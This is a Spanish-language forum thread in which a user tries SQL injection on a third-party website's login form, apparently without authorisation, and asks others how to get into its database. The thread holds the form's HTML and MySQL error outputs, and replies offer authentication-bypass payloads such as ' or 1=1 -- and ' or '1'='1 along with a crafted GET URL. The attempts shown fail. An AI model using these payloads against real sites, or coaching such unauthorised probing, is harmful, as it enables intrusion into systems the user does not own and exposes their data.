Hola a todos!
En una web me piden el nombre de usuario y contraseña (lo típico  ;D)
I bueno.... en vez de escribir un user como por ejemplo "ron" puse una comilla '.
Total que la página web me respondió lo siguiente:
select `con` from basdat2 where `user`=''';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
He estado mirando en el codigo fuente.... y la parte que me interesa es esta:
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
		<td colspan="1" style="text-align: left;">
		
<form ACTION ="./" METHOD=POST>
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
		<td colspan="1" style="text-align: left;">
		user	</td>
	<td colspan="1" style="text-align: left;">
		<input type=text name=user value="" size=30 MAXLENGTH=255> 
	</td>
</tr>
<tr>
		<td colspan="1" style="text-align: left;">
		contrasenya	</td>
	<td colspan="1" style="text-align: left;">
		<input type="password" name="contra" value="" size=30
		MAXLENGTH=255 >
	</td>
</tr>
<tr>
		<td colspan="1" style="text-align: left; width: 2%;">
			
<input name="Entrar!" value="Entrar!" type="submit">
	</td>
</tr>
</tbody></table>
</form>
He hecho pruebas.... i algunos resultados han sido:
Con 'hola:
select `con` from basdat2 where `user`=''hola';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hola'' at line 1
Con '<<<>>> el resultado es:
select `con` from basdat2 where `user`=''<<<>>>';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<>>>'' at line 1
En este último resultado he comprovado que algun simbolo ">" no aparece en la respuesta... Al igual que si tengo una peticion con comillas múltiples de dos.... me valida, en canvio si escribo por ejemplo 1, 3 o 5 comillas me sale el error...
Alguien tiene tiene alguna idea para intentar acceder a la base de datos???   
Gracias  :P
EDITO: Formulario completo ^^
			
			
			
				pon el formulario completo
			
			
			
				yoyahack gracias por decirmelo... no me había fijado que estaba incompleto :P
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
		<td colspan="1" style="text-align: left;">
		
<form ACTION ="./" METHOD=POST>
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
		<td colspan="1" style="text-align: left;">
		user	</td>
	<td colspan="1" style="text-align: left;">
		<input type=text name=user value="" size=30 MAXLENGTH=255> 
	</td>
</tr>
<tr>
		<td colspan="1" style="text-align: left;">
		contrasenya	</td>
	<td colspan="1" style="text-align: left;">
		<input type="password" name="contra" value="" size=30
		MAXLENGTH=255 >
	</td>
</tr>
<tr>
		<td colspan="1" style="text-align: left; width: 2%;">
			
<input name="Entrar!" value="Entrar!" type="submit">
	</td>
</tr>
</tbody></table>
</form>
Lo edito arriba. xD
			
			
			
				ps al parecer el error se produce al intentar poner datos invalido, no mucho se puede hacer...
			
			
			
				Cita de: yoyahack en  6 Enero 2010, 21:05 PM
ps al parecer el error se produce al intentar poner datos invalido, no mucho se puede hacer...
estoy de acuerdo..... pero notifico esta respuesta del servidor por si sirve de algo:
Escribiendo en el usuario  ' OR 1=1 //  la respuesta es la siguiente:
select `con` from basdat2 where `user`='' OR 1=1 //';
You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near '/'' at line 1Es interesante... parece que o valida el resto o hay un filtro anti-SQL-Inyection...
Alguna idea de que puede ser??? ;)
AÑADO ESTO:Es la URL que he conseguido examinando el codigo fuente del formulario.... ;D
http://paginaweb/?user=' OR 1=1 //&contra=cualquieraaaa&Entrar!=Entrar!
http://paginaweb/?user=%27%20OR%201=1%20//&contra=cualquieraaaa&Entrar!=Entrar!
Saludos!!!
			
 
			
			
				Prueba con 
Citar' or 1=1 -- 
con espacio al final ;-P
			
				Cita de: אครรเz en  7 Enero 2010, 12:50 PM
Prueba con 
Citar' or 1=1 -- 
con espacio al final ;-P
Gracias por la idea, lo he probado con espacio y no sale ningún error, es decir no accedo a nada :xD
Haciendo esto mismo sin el espacio... sale el error:
select `con` from basdat2 where `user`='' or 1=1 --';
You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1Probando esto antes de la comilla:  
-- '123el resultado es:
select `con` from basdat2 where `user`='-- '123';
You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near '123'' at line 1
			 
			
			
				' or '1'='1
			
			
			
				Cita de: kamsky en  7 Enero 2010, 15:28 PM
' or '1'='1
@kamsky una peticion con comillas múltiples de dos.... me valida, en canvio si escribo por ejemplo 1, 3 o 5 comillas me sale el error...
De todas formas gracias por la aportación  :)
			
 
			
			
				Si magic quotes esta on filtrara las comillas, creo que desde la version 5 vienen por defecto desactivadas.
			
			
			
				Cita de: yoyahack en  7 Enero 2010, 17:10 PM
Si magic quotes esta on filtrara las comillas, creo que desde la version 5 vienen por defecto desactivadas.
si... tienes razón al parecer esta opción está activada  :-(